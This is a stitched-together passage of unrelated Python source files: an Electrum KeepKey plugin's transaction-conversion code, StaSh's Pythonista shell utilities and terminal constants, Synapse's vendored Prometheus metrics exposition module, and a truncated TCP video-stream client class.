    def show_address(self, wallet, address, keystore=None):
        """Display ``address`` on the device screen for verification."""
        if keystore is None:
            keystore = wallet.get_keystore()
        if not self.show_address_helper(wallet, address, keystore):
            return
        if type(wallet) is not Standard_Wallet:
            keystore.handler.show_error(_('This function is only available for standard wallets when using {}.').format(self.device))
            return
        client = self.get_client(wallet.keystore)
        if not client.atleast_version(1, 3):
            wallet.keystore.handler.show_error(_("Your device firmware is too old"))
            return
        change, index = wallet.get_address_index(address)
        derivation = wallet.keystore.derivation
        address_path = "%s/%d/%d"%(derivation, change, index)
        address_n = client.expand_path(address_path)
        segwit = wallet.keystore.is_segwit()
        script_type = self.types.SPENDP2SHWITNESS if segwit else self.types.SPENDADDRESS
        client.get_address(self.get_coin_name(), address_n, True, script_type=script_type)

    def tx_inputs(self, tx, for_sig=False, segwit=False):
        """Convert electrum tx inputs into keepkeylib TxInputType messages.

        :param for_sig: when True, include derivation/multisig data needed
            for signing (not just for previous-tx serialization).
        """
        inputs = []
        for txin in tx.inputs():
            txinputtype = self.types.TxInputType()
            if txin['type'] == 'coinbase':
                # NOTE(review): str, not bytes — confirm keepkeylib accepts a
                # str for the bytes prev_hash field under Python 3.
                prev_hash = "\0"*32
                prev_index = 0xffffffff  # signed int -1
            else:
                if for_sig:
                    x_pubkeys = txin['x_pubkeys']
                    if len(x_pubkeys) == 1:
                        # Single-sig input: give the device the derivation path.
                        x_pubkey = x_pubkeys[0]
                        xpub, s = parse_xpubkey(x_pubkey)
                        xpub_n = self.client_class.expand_path(self.xpub_path[xpub])
                        txinputtype.address_n.extend(xpub_n + s)
                        txinputtype.script_type = self.types.SPENDP2SHWITNESS if segwit else self.types.SPENDADDRESS
                    else:
                        # Multisig input: build the redeem script description.
                        def f(x_pubkey):
                            if is_xpubkey(x_pubkey):
                                xpub, s = parse_xpubkey(x_pubkey)
                            else:
                                xpub = xpub_from_pubkey(0, bfh(x_pubkey))
                                s = []
                            node = self.ckd_public.deserialize(xpub)
                            return self.types.HDNodePathType(node=node, address_n=s)
                        pubkeys = map(f, x_pubkeys)
                        multisig = self.types.MultisigRedeemScriptType(
                            pubkeys=pubkeys,
                            signatures=map(lambda x: bfh(x)[:-1] if x else b'', txin.get('signatures')),
                            m=txin.get('num_sig'),
                        )
                        script_type = self.types.SPENDP2SHWITNESS if segwit else self.types.SPENDMULTISIG
                        txinputtype = self.types.TxInputType(
                            script_type=script_type,
                            multisig=multisig
                        )
                        # find which key is mine
                        for x_pubkey in x_pubkeys:
                            if is_xpubkey(x_pubkey):
                                xpub, s = parse_xpubkey(x_pubkey)
                                if xpub in self.xpub_path:
                                    xpub_n = self.client_class.expand_path(self.xpub_path[xpub])
                                    txinputtype.address_n.extend(xpub_n + s)
                                    break
                prev_hash = unhexlify(txin['prevout_hash'])
                prev_index = txin['prevout_n']
            if 'value' in txin:
                txinputtype.amount = txin['value']
            txinputtype.prev_hash = prev_hash
            txinputtype.prev_index = prev_index
            if txin.get('scriptSig') is not None:
                script_sig = bfh(txin['scriptSig'])
                txinputtype.script_sig = script_sig
            txinputtype.sequence = txin.get('sequence', 0xffffffff - 1)
            inputs.append(txinputtype)
        return inputs

    def tx_outputs(self, derivation, tx, segwit=False):
        """Convert electrum tx outputs into keepkeylib TxOutputType messages."""

        def create_output_by_derivation(info):
            # Describe an output by its derivation path so the device can
            # recognize it as belonging to the wallet (hides change outputs).
            index, xpubs, m = info
            if len(xpubs) == 1:
                script_type = self.types.PAYTOP2SHWITNESS if segwit else self.types.PAYTOADDRESS
                address_n = self.client_class.expand_path(derivation + "/%d/%d" % index)
                txoutputtype = self.types.TxOutputType(
                    amount=amount,
                    script_type=script_type,
                    address_n=address_n,
                )
            else:
                script_type = self.types.PAYTOP2SHWITNESS if segwit else self.types.PAYTOMULTISIG
                address_n = self.client_class.expand_path("/%d/%d" % index)
                nodes = map(self.ckd_public.deserialize, xpubs)
                pubkeys = [self.types.HDNodePathType(node=node, address_n=address_n) for node in nodes]
                multisig = self.types.MultisigRedeemScriptType(
                    pubkeys=pubkeys,
                    signatures=[b''] * len(pubkeys),
                    m=m)
                txoutputtype = self.types.TxOutputType(
                    multisig=multisig,
                    amount=amount,
                    address_n=self.client_class.expand_path(derivation + "/%d/%d" % index),
                    script_type=script_type)
            return txoutputtype

        def create_output_by_address():
            # Describe an output by its literal address / script.
            txoutputtype = self.types.TxOutputType()
            txoutputtype.amount = amount
            if _type == TYPE_SCRIPT:
                txoutputtype.script_type = self.types.PAYTOOPRETURN
                txoutputtype.op_return_data = address[2:]
            elif _type == TYPE_ADDRESS:
                if is_segwit_address(address):
                    txoutputtype.script_type = self.types.PAYTOWITNESS
                else:
                    addrtype, hash_160 = b58_address_to_hash160(address)
                    if addrtype == constants.net.ADDRTYPE_P2PKH:
                        txoutputtype.script_type = self.types.PAYTOADDRESS
                    elif addrtype == constants.net.ADDRTYPE_P2SH:
                        txoutputtype.script_type = self.types.PAYTOSCRIPTHASH
                    else:
                        raise Exception('addrtype: ' + str(addrtype))
                txoutputtype.address = address
            return txoutputtype

        outputs = []
        has_change = False
        any_output_on_change_branch = is_any_tx_output_on_change_branch(tx)
        for _type, address, amount in tx.outputs():
            use_create_by_derivation = False
            info = tx.output_info.get(address)
            if info is not None and not has_change:
                index, xpubs, m = info
                on_change_branch = index[0] == 1
                # prioritise hiding outputs on the 'change' branch from user
                # because no more than one change address allowed
                if on_change_branch == any_output_on_change_branch:
                    use_create_by_derivation = True
                    has_change = True
            if use_create_by_derivation:
                txoutputtype = create_output_by_derivation(info)
            else:
                txoutputtype = create_output_by_address()
            outputs.append(txoutputtype)
        return outputs

    def electrum_tx_to_txtype(self, tx):
        """Convert an electrum Transaction into a keepkeylib TransactionType
        (used to feed previous transactions to the device)."""
        t = self.types.TransactionType()
        d = deserialize(tx.raw)
        t.version = d['version']
        t.lock_time = d['lockTime']
        inputs = self.tx_inputs(tx)
        t.inputs.extend(inputs)
        for vout in d['outputs']:
            o = t.bin_outputs.add()
            o.amount = vout['value']
            o.script_pubkey = bfh(vout['scriptPubKey'])
        return t

    # This function is called from the TREZOR libraries (via tx_api)
    def get_tx(self, tx_hash):
        tx = self.prev_tx[tx_hash]
        return self.electrum_tx_to_txtype(tx)
|
shcommon.py | # -*- coding: utf-8 -*-
"""
The Control, Escape and Graphics are taken from pyte (https://github.com/selectel/pyte)
"""
import os
import sys
import platform
import functools
import threading
import ctypes
from itertools import chain
import six
# True when running inside the Pythonista iOS app.
IN_PYTHONISTA = sys.executable.find('Pythonista') >= 0

if IN_PYTHONISTA:
    import plistlib
    # Read the app bundle metadata to learn the Pythonista version.
    _properties = plistlib.readPlist(os.path.join(os.path.dirname(sys.executable), 'Info.plist'))
    PYTHONISTA_VERSION = _properties['CFBundleShortVersionString']
    PYTHONISTA_VERSION_LONG = _properties['CFBundleVersion']
    if PYTHONISTA_VERSION < '3.0':
        python_capi = ctypes.pythonapi
    else:
        # The default pythonapi always points to Python 3 in Pythonista 3
        # So we need to load the Python 2 API manually
        try:
            python_capi = ctypes.PyDLL(
                os.path.join(os.path.dirname(sys.executable),
                             'Frameworks/Py2Kit.framework/Py2Kit'))
        except OSError:
            python_capi = ctypes.PyDLL(
                os.path.join(os.path.dirname(sys.executable),
                             'Frameworks/PythonistaKit.framework/PythonistaKit'))
else:
    # Sensible fallbacks outside Pythonista.
    PYTHONISTA_VERSION = '0.0'
    PYTHONISTA_VERSION_LONG = '000000'
    python_capi = ctypes.pythonapi

platform_string = platform.platform()
ON_IPAD = platform_string.find('iPad') >= 0
# Checks the Darwin release component; presumably release 14 maps to iOS 8
# (as the name suggests) — confirm against Apple's version table.
ON_IOS_8 = platform_string.split('-')[1].startswith('14')
M_64 = platform_string.find('64bit') != -1

CTRL_KEY_FLAG = (1 << 18)  # Control key for keyCommands
CMD_KEY_FLAG = (1 << 20)  # Command key

# StaSh installation root (two levels above this module).
_STASH_ROOT = os.path.realpath(os.path.abspath(
    os.path.dirname(os.path.dirname(__file__))))
_STASH_CONFIG_FILES = ('.stash_config', 'stash.cfg')
_STASH_HISTORY_FILE = '.stash_history'
# directory for stash extensions
_STASH_EXTENSION_PATH = os.path.abspath(
    os.path.join(os.getenv("HOME"), "Documents", "stash_extensions"),
)
# directory for stash bin extensions
_STASH_EXTENSION_BIN_PATH = os.path.join(_STASH_EXTENSION_PATH, "bin")
# directory for stash man extensions
_STASH_EXTENSION_MAN_PATH = os.path.join(_STASH_EXTENSION_PATH, "man")
# directory for stash FSI extensions
_STASH_EXTENSION_FSI_PATH = os.path.join(_STASH_EXTENSION_PATH, "fsi")
# directory for stash patch extensions
_STASH_EXTENSION_PATCH_PATH = os.path.join(_STASH_EXTENSION_PATH, "patches")
# list of directories outside of _STASH_ROOT, used for simple mkdir
_EXTERNAL_DIRS = [
    _STASH_EXTENSION_PATH,
    _STASH_EXTENSION_BIN_PATH,
    _STASH_EXTENSION_MAN_PATH,
    _STASH_EXTENSION_FSI_PATH,
    _STASH_EXTENSION_PATCH_PATH,
]

# Python 3 or not Python 3
PY3 = six.PY3
# Save the true IOs
if IN_PYTHONISTA:
    # The stdio catchers recreation is copied from code written by @dgelessus
    # https://forum.omz-software.com/topic/1946/pythonista-1-6-beta/167
    # In pythonista beta 301006, _outputcapture was replaced with pykit_io
    try:
        import _outputcapture
    except ImportError:
        import pykit_io

        class _outputcapture(object):
            # Adapter exposing the old _outputcapture API on top of pykit_io.
            ReadStdin = pykit_io.read_stdin
            CaptureStdout = pykit_io.write_stdout
            CaptureStderr = pykit_io.write_stderr

    if sys.stdin.__class__.__name__ == 'StdinCatcher':
        _SYS_STDIN = sys.__stdin__ = sys.stdin
    elif sys.__stdin__.__class__.__name__ == 'StdinCatcher':
        _SYS_STDIN = sys.__stdin__
    else:
        class StdinCatcher(object):
            def __init__(self):
                self.encoding = 'utf8'

            def read(self, limit=-1):
                return _outputcapture.ReadStdin(limit)

            def readline(self):
                return _outputcapture.ReadStdin()

        _SYS_STDIN = StdinCatcher()

    if sys.stdout.__class__.__name__ == 'StdoutCatcher':
        _SYS_STDOUT = sys.__stdout__ = sys.stdout
    elif sys.__stdout__.__class__.__name__ == 'StdoutCatcher':
        _SYS_STDOUT = sys.__stdout__
    else:
        class StdoutCatcher(object):
            def __init__(self):
                self.encoding = 'utf8'

            def flush(self):
                pass

            def write(self, s):
                if isinstance(s, str):
                    _outputcapture.CaptureStdout(s)
                elif isinstance(s, six.text_type):
                    _outputcapture.CaptureStdout(s.encode('utf8'))

            def writelines(self, lines):
                self.write(''.join(lines))

        _SYS_STDOUT = StdoutCatcher()

    if sys.stderr.__class__.__name__ == 'StderrCatcher':
        _SYS_STDERR = sys.__stderr__ = sys.stderr
    # BUG FIX: this branch previously re-tested sys.stderr instead of
    # sys.__stderr__ (unlike the stdin/stdout branches above), so an existing
    # StderrCatcher saved in sys.__stderr__ was never detected and a fresh
    # catcher was created instead.
    elif sys.__stderr__.__class__.__name__ == 'StderrCatcher':
        _SYS_STDERR = sys.__stderr__
    else:
        class StderrCatcher(object):
            def __init__(self):
                self.encoding = 'utf8'

            def flush(self):
                pass

            def write(self, s):
                if isinstance(s, str):
                    _outputcapture.CaptureStderr(s)
                elif isinstance(s, six.text_type):
                    _outputcapture.CaptureStderr(s.encode('utf8'))

            def writelines(self, lines):
                self.write(''.join(lines))

        _SYS_STDERR = StderrCatcher()
else:
    # Outside Pythonista the real streams are already the true IOs.
    _SYS_STDOUT = sys.stdout
    _SYS_STDERR = sys.stderr
    _SYS_STDIN = sys.stdin

_SYS_PATH = sys.path
_OS_ENVIRON = os.environ
def is_binary_file(filename, nbytes=1024):
    """
    An approximate way to tell whether a file is binary.

    Reads up to *nbytes* bytes and reports binary as soon as a byte falls
    outside the printable/whitespace ASCII range.

    :param str filename: The name of the file to be tested.
    :param int nbytes: number of bytes to read for test
    :return: True if the sample looks binary, False otherwise.
    """
    allowed_ctrl = (9, 10, 13)  # tab, newline, carriage return
    with open(filename, 'rb') as ins:
        sample = ins.read(nbytes)
    for ch in sample:
        # On py2 iterating bytes yields 1-char strings; on py3 it yields ints.
        code = ch if isinstance(ch, six.integer_types) else ord(ch)
        if 127 < code < 256 or (code < 32 and code not in allowed_ctrl):
            return True
    return False
def sh_delay(func, nseconds):
    """Schedule *func* to run once after *nseconds* seconds.

    Returns the started threading.Timer so the caller may cancel it.
    """
    timer = threading.Timer(nseconds, func)
    timer.start()
    return timer
def sh_background(name=None):
    """Decorator factory: run the decorated callable in its own thread.

    The wrapped function starts a ``threading.Thread`` named *name*
    targeting the original callable and returns the (already started)
    thread object instead of the callable's result.
    """
    def decorator(func):
        @functools.wraps(func)
        def runner(*args, **kwargs):
            worker = threading.Thread(name=name, target=func, args=args, kwargs=kwargs)
            worker.start()
            return worker
        return runner
    return decorator
class ShFileNotFound(Exception):
    """Raised when a referenced file cannot be found."""
    pass
class ShIsDirectory(Exception):
    """Raised when a directory is given where a file was expected."""
    pass
class ShNotExecutable(Exception):
    """Raised when a file exists but is not executable by the shell."""

    def __init__(self, filename):
        # BUGFIX: the original called super(Exception, self).__init__,
        # which skips Exception itself and only worked by accident via
        # BaseException; initialize through the correct MRO instead.
        super(ShNotExecutable, self).__init__('{}: not executable\n'.format(filename))
class ShSingleExpansionRequired(Exception):
    """Raised when an expansion produced multiple results but exactly one was required."""
    pass
class ShEventNotFound(Exception):
    """Raised when a history-event reference cannot be resolved."""
    pass
class ShBadSubstitution(Exception):
    """Raised for a malformed variable/command substitution."""
    pass
class ShSyntaxError(Exception):
    """Raised when a command line cannot be parsed."""
    pass
class ShInternalError(Exception):
    """Raised for internal shell errors that are not the user's fault."""
    pass
class Control(object):
    """
    pyte.control
    ~~~~~~~~~~~~
    This module defines simple control sequences, recognized by
    :class:`~pyte.streams.Stream`, the set of codes here is for
    ``TERM=linux`` which is a superset of VT102.
    :copyright: (c) 2011-2013 by Selectel, see AUTHORS for details.
    :license: LGPL, see LICENSE for more details.

    Vendored here as a class of constants rather than a module.
    """
    #: *Space*: Not suprisingly -- ``" "``.
    SP = u" "
    #: *Null*: Does nothing.
    NUL = u"\u0000"
    #: *Bell*: Beeps.
    BEL = u"\u0007"
    #: *Backspace*: Backspace one column, but not past the beginning of the
    #: line.
    BS = u"\u0008"
    #: *Horizontal tab*: Move cursor to the next tab stop, or to the end
    #: of the line if there is no earlier tab stop.
    HT = u"\u0009"
    #: *Linefeed*: Give a line feed, and, if :data:`pyte.modes.LNM` (new
    #: line mode) is set also a carriage return.
    LF = u"\n"
    #: *Vertical tab*: Same as :data:`LF`.
    VT = u"\u000b"
    #: *Form feed*: Same as :data:`LF`.
    FF = u"\u000c"
    #: *Carriage return*: Move cursor to left margin on current line.
    CR = u"\r"
    #: *Shift out*: Activate G1 character set.
    SO = u"\u000e"
    #: *Shift in*: Activate G0 character set.
    SI = u"\u000f"
    #: *Cancel*: Interrupt escape sequence. If received during an escape or
    #: control sequence, cancels the sequence and displays substitution
    #: character.
    CAN = u"\u0018"
    #: *Substitute*: Same as :data:`CAN`.
    SUB = u"\u001a"
    #: *Escape*: Starts an escape sequence.
    ESC = u"\u001b"
    #: *Delete*: Is ignored.
    DEL = u"\u007f"
    #: *Control sequence introducer*: An equivalent for ``ESC [``.
    CSI = u"\u009b"
class Escape(object):
    """
    pyte.escape
    ~~~~~~~~~~~
    This module defines both CSI and non-CSI escape sequences, recognized
    by :class:`~pyte.streams.Stream` and subclasses.
    :copyright: (c) 2011-2013 by Selectel, see AUTHORS for details.
    :license: LGPL, see LICENSE for more details.

    Vendored here as a class of constants rather than a module.
    """
    #: *Reset*.
    RIS = u"c"
    #: *Index*: Move cursor down one line in same column. If the cursor is
    #: at the bottom margin, the screen performs a scroll-up.
    IND = u"D"
    #: *Next line*: Same as :data:`pyte.control.LF`.
    NEL = u"E"
    #: Tabulation set: Set a horizontal tab stop at cursor position.
    HTS = u"H"
    #: *Reverse index*: Move cursor up one line in same column. If the
    #: cursor is at the top margin, the screen performs a scroll-down.
    RI = u"M"
    #: Save cursor: Save cursor position, character attribute (graphic
    #: rendition), character set, and origin mode selection (see
    #: :data:`DECRC`).
    DECSC = u"7"
    #: *Restore cursor*: Restore previously saved cursor position, character
    #: attribute (graphic rendition), character set, and origin mode
    #: selection. If none were saved, move cursor to home position.
    DECRC = u"8"

    # "Percent" escape sequences.
    # ---------------------------
    #: *Select default (ISO 646 / ISO 8859-1)*.
    DEFAULT = u"@"
    #: *Select UTF-8*.
    UTF8 = u"G"
    #: *Select UTF-8 (obsolete)*.
    UTF8_OBSOLETE = u"8"

    # "Sharp" escape sequences.
    # -------------------------
    #: *Alignment display*: Fill screen with uppercase E's for testing
    #: screen focus and alignment.
    DECALN = u"8"

    # ECMA-48 CSI sequences.
    # ---------------------
    #: *Insert character*: Insert the indicated # of blank characters.
    ICH = u"@"
    #: *Cursor up*: Move cursor up the indicated # of lines in same column.
    #: Cursor stops at top margin.
    CUU = u"A"
    #: *Cursor down*: Move cursor down the indicated # of lines in same
    #: column. Cursor stops at bottom margin.
    CUD = u"B"
    #: *Cursor forward*: Move cursor right the indicated # of columns.
    #: Cursor stops at right margin.
    CUF = u"C"
    #: *Cursor back*: Move cursor left the indicated # of columns. Cursor
    #: stops at left margin.
    CUB = u"D"
    #: *Cursor next line*: Move cursor down the indicated # of lines to
    #: column 1.
    CNL = u"E"
    #: *Cursor previous line*: Move cursor up the indicated # of lines to
    #: column 1.
    CPL = u"F"
    #: *Cursor horizontal align*: Move cursor to the indicated column in
    #: current line.
    CHA = u"G"
    #: *Cursor position*: Move cursor to the indicated line, column (origin
    #: at ``1, 1``).
    CUP = u"H"
    #: *Erase data* (default: from cursor to end of line).
    ED = u"J"
    #: *Erase in line* (default: from cursor to end of line).
    EL = u"K"
    #: *Insert line*: Insert the indicated # of blank lines, starting from
    #: the current line. Lines displayed below cursor move down. Lines moved
    #: past the bottom margin are lost.
    IL = u"L"
    #: *Delete line*: Delete the indicated # of lines, starting from the
    #: current line. As lines are deleted, lines displayed below cursor
    #: move up. Lines added to bottom of screen have spaces with same
    #: character attributes as last line move up.
    DL = u"M"
    #: *Delete character*: Delete the indicated # of characters on the
    #: current line. When character is deleted, all characters to the right
    #: of cursor move left.
    DCH = u"P"
    #: *Erase character*: Erase the indicated # of characters on the
    #: current line.
    ECH = u"X"
    #: *Horizontal position relative*: Same as :data:`CUF`.
    HPR = u"a"
    #: *Vertical position adjust*: Move cursor to the indicated line,
    #: current column.
    VPA = u"d"
    #: *Vertical position relative*: Same as :data:`CUD`.
    VPR = u"e"
    #: *Horizontal / Vertical position*: Same as :data:`CUP`.
    HVP = u"f"
    #: *Tabulation clear*: Clears a horizontal tab stop at cursor position.
    TBC = u"g"
    #: *Set mode*.
    SM = u"h"
    #: *Reset mode*.
    RM = u"l"
    #: *Select graphics rendition*: The terminal can display the following
    #: character attributes that change the character display without
    #: changing the character (see :mod:`pyte.graphics`).
    SGR = u"m"
    #: *Select top and bottom margins*: Selects margins, defining the
    #: scrolling region; parameters are top and bottom line. If called
    #: without any arguments, whole screen is used.
    DECSTBM = u"r"
    #: *Horizontal position adjust*: Same as :data:`CHA`.
    HPA = u"'"
class Graphics(object):
    """
    pyte.graphics
    ~~~~~~~~~~~~~
    This module defines graphic-related constants, mostly taken from
    :manpage:`console_codes(4)` and
    http://pueblo.sourceforge.net/doc/manual/ansi_color_codes.html.
    :copyright: (c) 2011-2013 by Selectel, see AUTHORS for details.
    :license: LGPL, see LICENSE for more details.

    Vendored here as a class of constants; the 50-52 / 60-62 color codes
    are non-standard additions.
    """
    #: A mapping of ANSI text style codes to style names, "+" means the:
    #: attribute is set, "-" -- reset; example:
    #:
    #: >>> text[1]
    #: '+bold'
    #: >>> text[9]
    #: '+strikethrough'
    TEXT = {
        1: "+bold",
        3: "+italics",
        4: "+underscore",
        7: "+reverse",
        9: "+strikethrough",
        22: "-bold",
        23: "-italics",
        24: "-underscore",
        27: "-reverse",
        29: "-strikethrough"
    }
    #: A mapping of ANSI foreground color codes to color names, example:
    #:
    #: >>> FG[30]
    #: 'black'
    #: >>> FG[38]
    #: 'default'
    FG = {
        30: "black",
        31: "red",
        32: "green",
        33: "brown",
        34: "blue",
        35: "magenta",
        36: "cyan",
        37: "white",
        39: "default",  # white.
        50: "gray",
        51: "yellow",
        52: "smoke",
    }
    #: A mapping of ANSI background color codes to color names, example:
    #:
    #: >>> BG[40]
    #: 'black'
    #: >>> BG[48]
    #: 'default'
    BG = {
        40: "black",
        41: "red",
        42: "green",
        43: "brown",
        44: "blue",
        45: "magenta",
        46: "cyan",
        47: "white",
        49: "default",  # black.
        60: "gray",
        61: "yellow",
        62: "smoke",
    }
    # Reverse mapping of all available attributes -- keep this private!
    _SGR = {v: k for k, v in chain(FG.items(),
                                   TEXT.items())}
    _SGR.update({'bg-' + v: k for k, v in BG.items()})
_exposition.py | # -*- coding: utf-8 -*-
# Copyright 2015-2019 Prometheus Python Client Developers
# Copyright 2019 Matrix.org Foundation C.I.C.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""
This code is based off `prometheus_client/exposition.py` from version 0.7.1.
Due to the renaming of metrics in prometheus_client 0.4.0, this customised
vendoring of the code will emit both the old versions that Synapse dashboards
expect, and the newer "best practice" version of the up-to-date official client.
"""
import math
import threading
from collections import namedtuple
from http.server import BaseHTTPRequestHandler, HTTPServer
from socketserver import ThreadingMixIn
from urllib.parse import parse_qs, urlparse
from prometheus_client import REGISTRY
from twisted.web.resource import Resource
from synapse.util import caches
try:
from prometheus_client.samples import Sample
except ImportError:
Sample = namedtuple( # type: ignore[no-redef] # noqa
"Sample", ["name", "labels", "value", "timestamp", "exemplar"]
)
CONTENT_TYPE_LATEST = str("text/plain; version=0.0.4; charset=utf-8")
INF = float("inf")
MINUS_INF = float("-inf")
def floatToGoString(d):
    """Render *d* the way the Go Prometheus client prints floats."""
    value = float(d)
    if value == INF:
        return "+Inf"
    if value == MINUS_INF:
        return "-Inf"
    if math.isnan(value):
        return "NaN"
    text = repr(value)
    dot = text.find(".")
    # Go switches to exponents sooner than Python.
    # We only need to care about positive values for le/quantile.
    if value > 0 and dot > 6:
        mantissa = "{0}.{1}{2}".format(text[0], text[1:dot], text[dot + 1 :]).rstrip("0.")
        return "{0}e+0{1}".format(mantissa, dot - 1)
    return text
def sample_line(line, name):
    """Format one Prometheus text-exposition line for sample *line* under *name*."""
    if line.labels:
        escaped_pairs = [
            '{0}="{1}"'.format(
                key,
                val.replace("\\", r"\\").replace("\n", r"\n").replace('"', r"\""),
            )
            for key, val in sorted(line.labels.items())
        ]
        labelstr = "{{{0}}}".format(",".join(escaped_pairs))
    else:
        labelstr = ""
    if line.timestamp is not None:
        # Convert to milliseconds.
        timestamp = " {0:d}".format(int(float(line.timestamp) * 1000))
    else:
        timestamp = ""
    return "{0}{1} {2}{3}\n".format(
        name, labelstr, floatToGoString(line.value), timestamp
    )
def nameify_sample(sample):
    """
    If we get a prometheus_client<0.4.0 sample as a tuple, transform it into a
    namedtuple which has the names we expect.
    """
    if isinstance(sample, Sample):
        return sample
    # Old-style samples are (name, labels, value); pad the missing
    # timestamp and exemplar fields with None.
    return Sample(*sample, None, None)
def generate_latest(registry, emit_help=False):
    """Render *registry* in the Prometheus text format.

    Emits each metric twice where the names differ: once under the legacy
    (pre prometheus_client 0.4.0) name that existing Synapse dashboards
    expect, and once under the renamed "best practice" name.
    """
    # Trigger the cache metrics to be rescraped, which updates the common
    # metrics but do not produce metrics themselves
    for collector in caches.collectors_by_name.values():
        collector.collect()
    output = []
    for metric in registry.collect():
        if not metric.samples:
            # No samples, don't bother.
            continue
        mname = metric.name
        mnewname = metric.name
        mtype = metric.type
        # OpenMetrics -> Prometheus
        if mtype == "counter":
            mnewname = mnewname + "_total"
        elif mtype == "info":
            mtype = "gauge"
            mnewname = mnewname + "_info"
        elif mtype == "stateset":
            mtype = "gauge"
        elif mtype == "gaugehistogram":
            mtype = "histogram"
        elif mtype == "unknown":
            mtype = "untyped"
        # Output in the old format for compatibility.
        if emit_help:
            output.append(
                "# HELP {0} {1}\n".format(
                    mname,
                    metric.documentation.replace("\\", r"\\").replace("\n", r"\n"),
                )
            )
        output.append("# TYPE {0} {1}\n".format(mname, mtype))
        for sample in map(nameify_sample, metric.samples):
            # Get rid of the OpenMetrics specific samples
            # (for...else: only emit when no suffix matched).
            for suffix in ["_created", "_gsum", "_gcount"]:
                if sample.name.endswith(suffix):
                    break
            else:
                newname = sample.name.replace(mnewname, mname)
                if ":" in newname and newname.endswith("_total"):
                    newname = newname[: -len("_total")]
                output.append(sample_line(sample, newname))
        # Get rid of the weird colon things while we're at it
        if mtype == "counter":
            mnewname = mnewname.replace(":total", "")
        mnewname = mnewname.replace(":", "_")
        if mname == mnewname:
            continue
        # Also output in the new format, if it's different.
        if emit_help:
            output.append(
                "# HELP {0} {1}\n".format(
                    mnewname,
                    metric.documentation.replace("\\", r"\\").replace("\n", r"\n"),
                )
            )
        output.append("# TYPE {0} {1}\n".format(mnewname, mtype))
        for sample in map(nameify_sample, metric.samples):
            # Get rid of the OpenMetrics specific samples
            for suffix in ["_created", "_gsum", "_gcount"]:
                if sample.name.endswith(suffix):
                    break
            else:
                output.append(
                    sample_line(
                        sample, sample.name.replace(":total", "").replace(":", "_")
                    )
                )
    return "".join(output).encode("utf-8")
class MetricsHandler(BaseHTTPRequestHandler):
    """HTTP handler that gives metrics from ``REGISTRY``."""
    registry = REGISTRY

    def do_GET(self):
        """Serve the text-format metrics dump for a GET request."""
        registry = self.registry
        params = parse_qs(urlparse(self.path).query)
        # A "?help" query parameter turns on the HELP/TYPE comment lines.
        if "help" in params:
            emit_help = True
        else:
            emit_help = False
        try:
            output = generate_latest(registry, emit_help=emit_help)
        except Exception:
            self.send_error(500, "error generating metric output")
            raise
        self.send_response(200)
        self.send_header("Content-Type", CONTENT_TYPE_LATEST)
        self.end_headers()
        self.wfile.write(output)

    def log_message(self, format, *args):
        """Log nothing."""

    @classmethod
    def factory(cls, registry):
        """Returns a dynamic MetricsHandler class tied
        to the passed registry.
        """
        # This implementation relies on MetricsHandler.registry
        # (defined above and defaulted to REGISTRY).
        # As we have unicode_literals, we need to create a str()
        # object for type().
        cls_name = str(cls.__name__)
        MyMetricsHandler = type(cls_name, (cls, object), {"registry": registry})
        return MyMetricsHandler
class _ThreadingSimpleServer(ThreadingMixIn, HTTPServer):
    """Thread per request HTTP server."""
    # Make worker threads "fire and forget". Beginning with Python 3.7 this
    # prevents a memory leak because ``ThreadingMixIn`` starts to gather all
    # non-daemon threads in a list in order to join on them at server close.
    # Enabling daemon threads virtually makes ``_ThreadingSimpleServer`` the
    # same as Python 3.7's ``ThreadingHTTPServer``.
    daemon_threads = True
def start_http_server(port, addr="", registry=REGISTRY):
    """Starts an HTTP server for prometheus metrics as a daemon thread"""
    handler_cls = MetricsHandler.factory(registry)
    server = _ThreadingSimpleServer((addr, port), handler_cls)
    worker = threading.Thread(target=server.serve_forever)
    worker.daemon = True
    worker.start()
class MetricsResource(Resource):
    """
    Twisted ``Resource`` that serves prometheus metrics.
    """
    # Leaf resource: no further path traversal below this node.
    isLeaf = True

    def __init__(self, registry=REGISTRY):
        self.registry = registry

    def render_GET(self, request):
        """Return the text-format metrics body for a GET request."""
        request.setHeader(b"Content-Type", CONTENT_TYPE_LATEST.encode("ascii"))
        return generate_latest(self.registry)
|
net_video_stream.py | import socket
import numpy as np
from threading import Thread
import time as t
class NetVideoStream:
    """Background TCP client that continuously receives raw video frames.

    A frame is ``width * height * channel`` bytes of uint8 pixel data; the
    most recently received frame is kept in ``self.frame`` and returned by
    :meth:`read`.
    """

    def __init__(self, server_ip, server_port, width, height, channel):
        self.ip = server_ip
        self.port = server_port
        self.width = width
        self.height = height
        self.channel = channel
        # Size in bytes of one raw frame on the wire.
        self.image_size = width * height * channel
        self.sock = None
        self.connected = False
        self.stopped = True
        # Latest decoded frame; False until the first frame arrives.
        self.frame = False
        self.thread = None

    def connect(self):
        """Block until connected to the server (or until stop() is called)."""
        self.sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        self.sock.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
        self.connected = False
        print("[STREAM] connecting to server")
        while not self.connected:
            if self.stopped:
                break
            try:
                self.sock.connect((self.ip, self.port))
                self.connected = True
                print("[STREAM] connected to server")
            except Exception:
                # Server not up yet; retry shortly.
                t.sleep(0.02)
                continue
        return self.connected

    def disconnect(self):
        """Shut down and close the socket; tolerate already-dead sockets."""
        try:
            self.sock.shutdown(socket.SHUT_RDWR)
        except Exception as e:
            print("[STREAM] error on disconnect {}".format(e))
        self.sock.close()
        self.connected = False

    def read_data(self, length):
        """Read exactly *length* bytes; return them, or False on error/stop."""
        if self.stopped:
            return False
        msgparts = []
        while length > 0:
            try:
                chunk = self.sock.recv(length)
            except Exception:
                return False
            if not chunk:
                # BUGFIX: recv() returns b"" when the peer closes the
                # connection; without this check the loop spins forever
                # because length never decreases.
                return False
            msgparts.append(chunk)
            length -= len(chunk)
        return b"".join(msgparts)

    def read_image(self):
        """Receive one full frame; return it as an ndarray, or False on failure."""
        if self.stopped:
            return False
        length = self.image_size
        msgparts = []
        while length > 0:
            try:
                chunk = self.sock.recv(length)
                if not chunk:
                    # Peer closed the stream mid-frame.
                    return False
            except Exception:
                return False
            msgparts.append(chunk)
            length -= len(chunk)
